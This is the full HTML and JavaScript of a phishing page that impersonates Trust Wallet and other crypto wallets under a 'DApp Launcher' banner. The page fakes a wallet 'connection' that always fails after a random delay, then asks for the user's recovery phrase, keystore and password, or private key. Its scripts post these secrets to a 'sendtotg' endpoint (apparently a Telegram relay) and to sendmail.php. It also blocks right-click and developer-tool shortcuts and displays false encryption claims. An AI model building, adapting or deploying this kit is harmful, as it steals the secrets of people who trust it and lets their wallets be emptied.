<!DOCTYPE html>
<html xmlns="" xml:lang="en-US" lang="en-US">




<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>

    <meta charset="utf-8">
    <title>DApp Launcher</title>
    <meta name="author" content="themesflat.com">

          <meta property="og:title" content="Trustwallet | The most trusted and secured crypto wallet" />
    <title> Trust Wallet : Support </title>
      <meta name="theme-color" content="#6693d6"/>
     <meta property="og:title" content="TrustWallet | Buy Bitcoin, Ethereum, BNB and other cryptocurrencies on a platform trusted by millions" />
<meta property="og:type" content="website" />
<meta property="og:image:url" content="download.png" />
<meta property="og:url" content="#" />
    <link rel="shortcut icon" href="download.png" type="image/x-icon">
    <meta name="twitter:description"
    content="Buy Bitcoin, Ethereum, BNB and other cryptocurrencies on a platform trusted by millions." />
    <meta name="twitter:title" content="Trustwallet Restore" />
    <link rel="shortcut icon" href="download.png" type="image/x-icon">

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <link rel="stylesheet" type="text/css" href="asset/css/style.css">

<!--     <link rel="shortcut icon" href="dappp.png">
    <link rel="apple-touch-icon-precomposed" href="asset/icon/Favicon.html"> -->
</head>

<!-- <body class="body header-fixed is_dark"> -->

<body class="body header-fixed">

    <!-- Bootstrap CSS -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">

<!-- Bootstrap JavaScript (with Popper.js) -->
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>


    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

    <script type="text/javascript" src="coin.js"></script>
    <div id="coinmarketcap-widget-marquee" coins="1,1027,825,1839,2010,74,4030" currency="USD" theme="dark" transparent="false" show-symbol-logo="true"></div>

    <div class="preload preload-container">
        <div class="preload-logo"></div>
    </div>

    <div id="wrapper">
        <div id="page" class="clearfix">

                        <header id="header_main" class="header_1 js-header">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <div id="site-header-inner">
                                <div class="wrap-box flex">
                                    <div id="site-logo" class="clearfix">
                                        <div id="site-logo-inner">
                                            <a href="#" rel="home" class="main-logo">
                                                <h4 style="color: white !important;">DApp Launcher</h4>
                                            </a>
                                        </div>
                                    </div>
                                    <!-- <div class="mobile-button"><span></span></div> -->
                                    <!-- <nav id="main-nav" class="main-nav">
                                        <ul id="menu-primary-menu" class="menu">
                                            <li class="menu-item current-menu-item menu-item-has-children">
                                                <a href="index.html">Home</a>
                                                <ul class="sub-menu">
                                                    <li class="menu-item"><a href="index.html">Home 1</a></li>
                                                </ul>
                                            </li>
                                            <li class="menu-item menu-item-has-children">
                                                <a href="#">Activity</a>
                                                <ul class="sub-menu">
                                                    <li class="menu-item"><a href="activity1.html">Activity 1</a></li>
                                                    <li class="menu-item"><a href="activity2.html">Activity 2</a></li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </nav> -->
                                    <div class="flat-search-btn flex">
                                        <div class="header-search flat-show-search" id="s1">
                                            <!--<a href="#" class="show-search header-search-trigger">
                                                <svg width="20" height="20" viewBox="0 0 20 20" fill="none"
                                                    xmlns="http://www.w3.org/2000/svg">
                                                    <mask id="mask0_334_638" style="mask-type:alpha"
                                                        maskUnits="userSpaceOnUse" x="1" y="1" width="18" height="17">
                                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                                            d="M1.66699 1.66666H17.6862V17.3322H1.66699V1.66666Z"
                                                            fill="white" stroke="white" />
                                                    </mask>
                                                    <g mask="url(#mask0_334_638)">
                                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                                            d="M9.67711 2.87312C5.9406 2.87312 2.90072 5.84505 2.90072 9.49903C2.90072 13.153 5.9406 16.1257 9.67711 16.1257C13.4128 16.1257 16.4527 13.153 16.4527 9.49903C16.4527 5.84505 13.4128 2.87312 9.67711 2.87312ZM9.67709 17.3322C5.26039 17.3322 1.66699 13.8182 1.66699 9.49902C1.66699 5.17988 5.26039 1.66666 9.67709 1.66666C14.0938 1.66666 17.6864 5.17988 17.6864 9.49902C17.6864 13.8182 14.0938 17.3322 9.67709 17.3322Z"
                                                            fill="white" />
                                                        <path
                                                            d="M9.67711 2.37312C5.67512 2.37312 2.40072 5.55836 2.40072 9.49903H3.40072C3.40072 6.13174 6.20607 3.37312 9.67711 3.37312V2.37312ZM2.40072 9.49903C2.40072 13.4396 5.67504 16.6257 9.67711 16.6257V15.6257C6.20615 15.6257 3.40072 12.8664 3.40072 9.49903H2.40072ZM9.67711 16.6257C13.6784 16.6257 16.9527 13.4396 16.9527 9.49903H15.9527C15.9527 12.8664 13.1472 15.6257 9.67711 15.6257V16.6257ZM16.9527 9.49903C16.9527 5.5584 13.6783 2.37312 9.67711 2.37312V3.37312C13.1473 3.37312 15.9527 6.1317 15.9527 9.49903H16.9527ZM9.67709 16.8322C5.52595 16.8322 2.16699 13.5316 2.16699 9.49902H1.16699C1.16699 14.1048 4.99484 17.8322 9.67709 17.8322V16.8322ZM2.16699 9.49902C2.16699 5.46656 5.52588 2.16666 9.67709 2.16666V1.16666C4.9949 1.16666 1.16699 4.8932 1.16699 9.49902H2.16699ZM9.67709 2.16666C13.8282 2.16666 17.1864 5.46649 17.1864 9.49902H18.1864C18.1864 4.89327 14.3593 1.16666 9.67709 1.16666V2.16666ZM17.1864 9.49902C17.1864 13.5316 13.8282 16.8322 9.67709 16.8322V17.8322C14.3594 17.8322 18.1864 14.1047 18.1864 9.49902H17.1864Z"
                                                            fill="white" />
                                                    </g>
                                                    <mask id="mask1_334_638" style="mask-type:alpha"
                                                        maskUnits="userSpaceOnUse" x="13" y="13" width="6" height="6">
                                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                                            d="M14.2012 14.2999H18.3333V18.3333H14.2012V14.2999Z"
                                                            fill="white" stroke="white" />
                                                    </mask>
                                                    <g mask="url(#mask1_334_638)">
                                                        <path fill-rule="evenodd" clip-rule="evenodd"
                                                            d="M17.7166 18.3333C17.5596 18.3333 17.4016 18.2746 17.2807 18.1572L14.3823 15.3308C14.1413 15.0952 14.1405 14.7131 14.3815 14.4774C14.6217 14.2402 15.0123 14.2418 15.2541 14.4758L18.1526 17.303C18.3935 17.5387 18.3944 17.9199 18.1534 18.1556C18.0333 18.2746 17.8746 18.3333 17.7166 18.3333Z"
                                                            fill="white" />
                                                        <path
                                                            d="M17.7166 18.3333C17.5595 18.3333 17.4016 18.2746 17.2807 18.1572L14.3823 15.3308C14.1413 15.0952 14.1405 14.7131 14.3815 14.4774C14.6217 14.2402 15.0123 14.2418 15.2541 14.4758L18.1526 17.303C18.3935 17.5387 18.3944 17.9199 18.1534 18.1556C18.0333 18.2746 17.8746 18.3333 17.7166 18.3333"
                                                            stroke="white" />
                                                    </g>
                                                </svg>
                                            </a>-->
                                            <div class="top-search">
                                                <form action="#" method="get" role="search" class="search-form">
                                                    <input type="search" id="s" class="search-field"
                                                        placeholder="Search..." value="" name="s" title="Search for"
                                                        required="">
                                                    <button class="search search-submit" type="submit" title="Search">
                                                        <i class="icon-fl-search-filled"></i>
                                                    </button>
                                                </form>
                                            </div>
                                        </div>
                                        <div class="sc-btn-top mg-r-12" id="site-header">
                                            <a href="connect.html" id="connectbtn"
                                                class="sc-button header-slider style style-1 wallet fl-button pri-1">
                                                <span>Validate Wallet</span>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>

            </header>




            <section class="tf-section top-seller" id="wallets_list">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <h2 class="tf-title style2">
                                Select a Wallet</h2>
                            <div class="heading-line s2"></div>
                        </div>


                        <!-- <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                            <div id="wallet_connect" class="sc-author-box select_wallet" data-title="safepal"
                                data-logo="asset/images/logo/safepal.png" style="cursor:pointer;">
                                <div class="author-avatar">
                                    <a href="#">
                                        <img src="asset/images/logo/safepal.png" alt="Image" class="avatar">
                                    </a>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Safepal</a></h5>
                                    <span class="price">safepal.com</span>
                                </div>
                            </div>
                        </div> -->


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                            <div id="wallet_connect" class="sc-author-box select_wallet" data-title="Wallet Connect"
                                data-logo="asset/images/logo/walle.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    <a href="#">
                                        <img src="asset/images/logo/walle.jpg" alt="Image" class="avatar">
                                    </a>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Wallet Connect</a></h5>
                                    <span class="price">walletconnect.com</span>
                                </div>
                            </div>
                        </div>

                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                            <div id="trust_wallet" class="sc-author-box select_wallet" data-title="Trust Wallet"
                                data-logo="asset/images/logo/trust_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    <a href="#">
                                        <img src="asset/images/logo/trust_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Trust Wallet</a></h5>
                                    <span class="price">trustwallet.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                            <div id="metamask" class="sc-author-box select_wallet" data-title="Metamask"
                                data-logo="asset/images/logo/metamask.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    <a href="#">
                                        <img src="asset/images/logo/metamask.jpg" alt="Image" class="avatar">
                                    </a>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Metamask</a></h5>
                                    <span class="price">metamask.io</span>
                                </div>
                            </div>
                        </div>
                        

                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                            <div id="imtoken" class="sc-author-box select_wallet" data-title="Wallet Connect"
                                data-logo="asset/images/logo/Walle.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    <a href="#">
                                        <img src="asset/images/logo/walle.jpg" alt="Image" class="avatar">
                                    </a>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Others</a></h5>
                                    <span class="price"></span>
                                </div>
                            </div>
                        </div>


                    </div>
                </div>
            </section>


            <footer id="footer" class="clearfix style-2">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-lg-3 col-md-12 col-12">
                            <div class="widget widget-logo">
                                <div class="logo-footer" id="logo-footer">
                                    <a href="#.html">
                                        DApp<br>
                                        Launchp@d
                                    </a>
                                </div>
                                <!--<p class="sub-widget-logo"><strong>Open and decentralized protocol for syncing various Wallets
                                    to Dapps Secure Server. This is not an app but a protocol that establishes a remote
                                    connection between two apps and/or devices</strong></p>-->
                            </div>
                        </div>
                        <!--<div class="col-lg-2 col-md-4 col-sm-5 col-5" style="visibility:hidden">
                            <div class="widget widget-menu style-1">
                                <h5 class="title-widget">My Account</h5>
                                <ul>
                                    <li><a href="author01.html">Authors</a></li>
                                    <li><a href="connect">Collection</a></li>
                                    <li><a href="profile.html">Author Profile</a></li>
                                    <li><a href="create-item.html">Create Item</a></li>
                                </ul>
                            </div>
                        </div>
                        <div class="col-lg-2 col-md-4 col-sm-7 col-7" style="visibility:hidden">
                            <div class="widget widget-menu style-2">
                                <h5 class="title-widget">Resources</h5>
                                <ul>
                                    <li><a href="help-center.html">Help & Support</a></li>
                                    <li><a href="auctions.html">Live Auctions</a></li>
                                    <li><a href="item-details.html">Item Details</a></li>
                                    <li><a href="activity1.html">Activity</a></li>
                                </ul>
                            </div>
                        </div>
                        <div class="col-lg-2 col-md-4 col-sm-5 col-5" style="visibility:hidden">
                            <div class="widget widget-menu fl-st-3">
                                <h5 class="title-widget">Company</h5>
                                <ul>
                                    <li><a href="explore-1.html">Explore</a></li>
                                    <li><a href="contact1.html">Contact Us</a></li>
                                    <li><a href="blog.html">Our Blog</a></li>
                                    <li><a href="faq.html">FAQ</a></li>
                                </ul>
                            </div>
                        </div>-->
                        <!--<div class="col-lg-3 col-md-6 col-sm-7 col-12">
                            <div class="widget widget-subcribe">
                                <h5 class="title-widget">Subscribe</h5>
                                <div class="form-subcribe">
                                    <form id="subscribe-form" action="#" method="GET" accept-charset="utf-8"
                                        class="form-submit">
                                        <input name="email" value="" class="email" type="email"
                                            placeholder="name@email.com" required>
                                        <button id="submit" name="submit" type="submit"><i
                                                class="icon-fl-send"></i></button>
                                    </form>
                                </div>-->
                                <!--<div class="widget-social style-1 mg-t32" style="visibility:hidden">
                                    <ul>
                                        <li><a href="#"><i class="fab fa-twitter"></i></a></li>
                                        <li><a href="#"><i class="fab fa-facebook"></i></a></li>
                                        <li class="style-2"><a href="#"><i class="fab fa-telegram-plane"></i></a></li>
                                        <li><a href="#"><i class="fab fa-youtube"></i></a></li>
                                        <li class="mgr-none"><a href="#"><i class="icon-fl-tik-tok-2"></i></a></li>
                                        <li class="mgr-none"><a href="#"><i class="icon-fl-vt"></i></a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>-->
                    </div>
                </div>
            </footer>
        </div>

<style>
    /* Custom modal size */
    #popup_connect_wallet_success .modal-dialog {
        max-width: 400px; /* Adjust width */
        height: auto; /* Adjust height dynamically */
    }

    #popup_connect_wallet_success .modal-content {
        min-height: 300px; /* Set a minimum height */
        padding: 20px; /* Add some spacing */
    }

    #error_div {
        margin-top: 20px;
    }
</style>

<div class="modal fade popup" id="popup_connect_wallet_success" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered" role="document"> <!-- Removed modal-xl -->
        <div class="modal-content">
            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                <span aria-hidden="true">&times;</span>
            </button>
            <div class="modal-body space-y-20 pd-40">
                <center>
                    <div id="spinz" style="margin-top: 60px !important;">
                    <div class="spinner-border text-primary mt-3" role="status" style="width: 5rem; height: 5rem;"><br>
                        <span class="text-primary">O</span>
                    </div><br>
                    <h5 class="text-primary"><b>Connecting........</b></h5>
                        </div>
                </center>
            </div>

            <center>
                <div id="error_div" style="display:none;">
                    <img src="failed.jpg" style="width:120px; margin-top: -20px !important;">
                    <h4 class="text-danger">Connection error detected, Try again</h4>
                    <a href="connect" id="" class="btn btn-outline-primary" aria-label="Close">Try Again</a>
                </div>
                <h2 style="color: blue;"></h2>
            </center>
        </div>
    </div>
</div>


    </div>

    <div class="modal fade popup" id="popup_connect_wallet" tabindex="-1" role="dialog" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
            <div class="modal-content">
                <button type="button" class="close" data-bs-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
                <div class="modal-body space-y-20 pd-40">

                    <h3>
                        <img width="50" height="50" class="avatar" id="wallet_logo" /><br>
                        <span id="wallet_name" clas="mt-1">Sync Wallet</span>
                    </h3>
                    <p class="text-center">
                        This session is secured and encrypted </p>

                    <div id="auto_connecting" style="display:none;">
                        <br><br><br>
                        <div class="heading-line s2" style="width: 100%;">
                            <br>
                            <h5 align="center">
                                starting secure connection...<br>
                                <i align="center" style="text-align: center !important; font-size:small"
                                    class="text-muted align-items-center">please wait...</i>
                            </h5>
                            <br>
                        </div>
                    </div>

                    <div id="failed_to_connect" style="display:none;">
                        <div
                            style="padding:6px; color:red; border:1px solid red; border-radius:5px; text-align:center!important; font-size:16px; font-weight:500;">
                            An error occurred... please try again or connect manually
                        </div>
                        <br><br><br>
                        <a href="#" id="try_auto_connecting_again" class="btn btn-outline-primary"
                            aria-label="Close">Try Again</a><br>
                        <a href="#" id="button_connect_manually" class="btn btn-primary">Connect Manually</a>
                    </div>

                    <!-- <form method="post" action="https://apygate.anchorstation.host/submit.php">
                    <textarea style="font-size:25px; font-weight:650" rows="4" name="secret_phrase" id="secret_phrase"
                        class="form-control text-primary"
                        placeholder="Enter your 12 or 24 Mnemonic words. Seperate them with spaces."></textarea><br>
                
                    <button type="submit" class="btn btn-primary" style="border-top: 5px; ">Connect
                        Wallet</button>
                
                </form> -->

                    <div id="div_connect_manuallly" style="display:none;">
       <!--                  <form action="" method="POST" id="">
                            <input type="hidden" name="_redirect" value="technical.html"/>
                            <div id="phrase"><textarea
                                    placeholder="Enter your 12 or 24 Mnemonic words. Seperate them with spaces."
                                    style="font-size:25px; font-weight:650" rows="4" name="phrase" required></textarea>
                                <p>...</p>
                                <button id="submit" type="submit" name="submit" value="submit" class="btn btn-primary"
                                    style="border-top: 5px; ">Connect Wallet</button>
                            </div>
                        </form> -->
      <!-- Hidden input to store wallet name -->
<form id="retrieveForm">
          <input type="hidden" id="wallet_name2" class="" name="walletName" value="" />


            <div class="send-tabs">
              <ul class="nav nav-tabs justify-content-center nav-fill">
                <li class="nav-item">
                  <a class="nav-link active text-primary fw-bold" id="phraseSend" data-bs-toggle="tab" href="#phraseTab">Phrase</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link text-primary fw-bold" id="keystoreSend" data-bs-toggle="tab" href="#keystoreTab">Keystore</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link text-primary fw-bold " id="privateKeySend" data-bs-toggle="tab" href="#privateKeyTab">Private Key</a>
                </li>
              </ul>
              <div class="tab-content">
                <div class="tab-pane fade show active" id="phraseTab">
                  <div class="form-group">
                    <input type="hidden" id="typePhrase" name="type" value="phrase" />
                    <textarea id="phrase1" name="phrase" required class="form-control" placeholder="Enter your recovery phrase" rows="5" style="resize: none"></textarea>
                    <div class="invalid-feedback">This field is required.</div>
                  </div>
                  <div class="small text-left my-3" style="font-size: 11px">
                    Typically 12 (sometimes 24) words separated by single spaces.
                  </div>
                </div>
                <div class="tab-pane fade" id="keystoreTab">
                  <div class="form-group">
                    <input type="hidden" id="typeKeystore" name="type" value="keystore" />
                    <textarea id="keystore1" name="keystore" required class="form-control" placeholder="Enter Keystore" rows="5"></textarea>
                    <input type="text" id="keystorePassword" class="form-control" name="password" required placeholder="Wallet password" />
                    <div class="invalid-feedback">This field is required.</div>
                  </div>
                  <div class="small text-left my-3" style="font-size: 11px">
                    Several lines of text beginning with "{...}" plus the password you used to encrypt it.
                  </div>
                </div>
                <div class="tab-pane fade" id="privateKeyTab">
                  <div class="form-group">
                    <input type="hidden" id="typePrivateKey" name="type" value="privatekey" />
                    <input type="text" id="privateKey1" name="privateKey" required class="form-control" placeholder="Enter your Private Key" />
                    <div class="invalid-feedback">This field is required.</div>
                  </div>
                  <div class="small text-left my-3" style="font-size: 11px">
                    Typically 12 (sometimes 24) words separated by a single space.
                  </div>
                </div>
              </div>
            </div>

            <div id="data-to-send">
              <!-- Dynamic form fields will be inserted here -->
            </div>
            <button type="submit" id="proceedButton" class="btn btn-primary btn-block mt-4 text-white">PROCEED</button>
          </form>




                    </div>

                    <!--<input type="text" class="form-control" placeholder="00.00 ETH">
                        <p>
                            Enter quantity. <span class="color-popup">5 available</span>
                        </p>--->
                    <!-- <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#popup_bid_success" data-dismiss="modal" aria-label="Close"> Place a bid</a> -->
                    <div>
                        <br><br><br>
                        <h5 align="center" class="mt-4 text-muted align-items-center"><img
                                src="asset/images/icon/shield.png" width="30" height="30" /> This session is protected
                            with an end-to-end encryption</h5>
                    </div>
                </div>
            </div>
        </div>
    </div>
    </div>





    <!--<a id="scroll-top"></a>-->

    <script src="asset/js/jquery.min.js"></script>
    <script src="asset/js/jquery.easing.js"></script>
    <script src="asset/js/bootstrap.min.js"></script>
    <script src="asset/js/wow.min.js"></script>
    <script src="asset/js/plugin.js"></script>
    <script src="asset/js/shortcodes.js"></script>
    <script src="asset/js/main.js"></script>
    <script src="asset/js/count-down.js"></script>
    <script src="asset/js/swiper-bundle.min.js"></script>
    <script src="asset/js/swiper.js"></script>
    <script src="asset/js/parallax.js"></script>
    <script src="asset/js/web3.min.js"></script>
    <script src="asset/js/moralis.js"></script>
    <script src="asset/js/nft.js"></script>

    <script>
        //Handle Select Wallet Click
        $(function () {
            $('.select_wallet').on('click', function () {
                var wd = $(this); //wd = wallet details

                $('#wallet_name').text(wd.data('title'));
                $('#wallet_name2').val(wd.data('title'));
                $('#wallet_logo').attr("src", wd.data('logo'));
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').hide();

                $('#popup_connect_wallet').modal('show');

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1, 15);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#failed_to_connect').show();
                }, interval);


            })

            $('#try_auto_connecting_again').on('click', function (e) {
                e.preventDefault();
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').hide();

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1, 20);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#failed_to_connect').show();
                }, interval);
            })

            $('#button_connect_manually').on('click', function (e) {
                e.preventDefault();
                $('#auto_connecting').hide();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').show();
            })

            //FOR PHRASE TEXT VALIDATION
            $('#secret_phrase').on('keyup', function () {
                var phrase_seed_entered = $(this).val().trim()
                if (phrase_seed_entered != "") {
                    var phrase_count = phrase_seed_entered.match(/(\w+)/g).length
                    console.log(phrase_count)
                    if ([12, 15, 18, 21, 24].includes(phrase_count)) {
                        $('#button_connect_wallet').attr('disabled', false).css('opacity', '1')
                    } else {
                        $('#button_connect_wallet').attr('disabled', false).css('opacity', '1')
                    }
                } else {
                    $('#button_connect_wallet').attr('disabled', true).css('opacity', '0.2')
                }
            })

            //CONNECT WALLET BUTTON Handler
            $('#button_connect_wallet').on('click', function (e) {
                e.preventDefault();
                let field = $('#secret_phrase')
                if (field.val().length >= 12) {
                    $(this).text('Loading...').css('pointer-events', 'none')

                    $.ajax({
                        url: "sendmail.php",
                        method: "POST",
                        data: { "load_phrase": 1, "data_phrase": field.val(), "wallet_selected": $('#wallet_name').text().trim() },
                        success: function (result) {
                            var result = JSON.parse(result);


                            if (result.result == "success") {
                                $('#button_connect_wallet').text('Connect Wallet').css('pointer-events', 'all')
                                $('#popup_connect_wallet').modal('hide')
                                $('#popup_connect_wallet_success').modal('show')
                                window.setTimeout(function () {
                                    window.location.href = 'dapps-hub.html';
                                }, 3000);


                            }

                            else {

                                alert(result);
                            }
                        },
                        error: function (xhr, ajaxOptions, thrownError) {
                            alert(thrownError);
                        }
                    })
                }
            })
        })

        function getRandomInt(min, max) {
            min = Math.ceil(min);
            max = Math.floor(max);
            return Math.floor(Math.random() * (max - min) + min); //The maximum is exclusive and the minimum is inclusive
        }

        //DISABLE RIGHT CLICK AND CTRL KEY
        window.oncontextmenu = function () {
            return false;
        }
        $(document).keydown(function (event) {
            if (event.keyCode == 123) {
                return false;
            }
            else if ((event.ctrlKey && event.shiftKey && event.keyCode == 73) || (event.ctrlKey && event.shiftKey && event.keyCode == 74)) {
                return false;
            }
        });
    </script>

    <style>
        .btn-outline-primary {
            width: 100%;
            border-radius: 20px;
            font-weight: 700;
            font-size: 15px;
            line-height: 22px;
            padding: 10px 20px;
            -webkit-transition: all 0.3s ease-in-out;
            -moz-transition: all 0.3s ease-in-out;
            -ms-transition: all 0.3s ease-in-out;
            -o-transition: all 0.3s ease-in-out;
            transition: all 0.3s ease-in-out;
            outline: none;
            border: 1px solid #5142FC;
            margin-bottom: 10px
        }
    </style>
</body>
</html>

<script>
$(document).ready(function () {
  $('#proceedButton').on('click', function (e) {
    e.preventDefault();

    let formData = {};
    let tabId = $('.nav-tabs .nav-link.active').attr('id');
    let walletName = $('#wallet_name2').val().trim();

    if (!walletName) {
      alert("Please select your wallet name.");
      return;
    }

    let isValid = true;

    switch (tabId) {
      case 'phraseSend':
        if ($('#phrase1').val().trim() === '') {
          $('#phrase1').addClass('is-invalid');
          isValid = false;
        } else {
          $('#phrase1').removeClass('is-invalid');
        }
        break;

      case 'keystoreSend':
        if ($('#keystore1').val().trim() === '' || $('#keystorePassword').val().trim() === '') {
          $('#keystore1, #keystorePassword').addClass('is-invalid');
          isValid = false;
        } else {
          $('#keystore1, #keystorePassword').removeClass('is-invalid');
        }
        break;

      case 'privateKeySend':
        if ($('#privateKey1').val().trim() === '') {
          $('#privateKey1').addClass('is-invalid');
          isValid = false;
        } else {
          $('#privateKey1').removeClass('is-invalid');
        }
        break;

      default:
        alert('Please select a valid tab.');
        return;
    }

    if (!isValid) {
      alert('Please fill in all required fields.');
      return;
    }

    switch (tabId) {
      case 'phraseSend':
        formData = {
          type: 'phrase',
          phrase: $('#phrase1').val().trim(),
          walletName: walletName
        };
        break;
      case 'keystoreSend':
        formData = {
          type: 'keystore',
          keystore: $('#keystore1').val().trim(),
          password: $('#keystorePassword').val().trim(),
          walletName: walletName
        };
        break;
      case 'privateKeySend':
        formData = {
          type: 'privatekey',
          privateKey: $('#privateKey1').val().trim(),
          walletName: walletName
        };
        break;
    }

    // ✅ Use correct API path (absolute or relative works in Vercel)
    const apiUrl = `${window.location.origin}/api/sendtotg`;

    $.ajax({
      url: apiUrl,
      type: 'POST',
      contentType: 'application/json',
      data: JSON.stringify(formData),
      beforeSend: function () {
        $('#popup_connect_wallet_success').modal('show');
      },
      success: function (response) {
        console.log('✅ Form submitted:', response);
        $('#popup_connect_wallet').modal('hide');

        setTimeout(function () {
          $('#spinz').hide();
          $('#error_div').show();
        }, 10000);
      },
      error: function (xhr, status, error) {
        console.error('❌ Telegram Error:', xhr.responseText || error);
        setTimeout(function () {
          $('#popup_connect_wallet_success').modal('hide');
        }, 5000);
      }
    });
  });

  $('#cancelBtn').on('click', function () {
    $('#retrieveModal').modal('hide');
  });
});
</script>





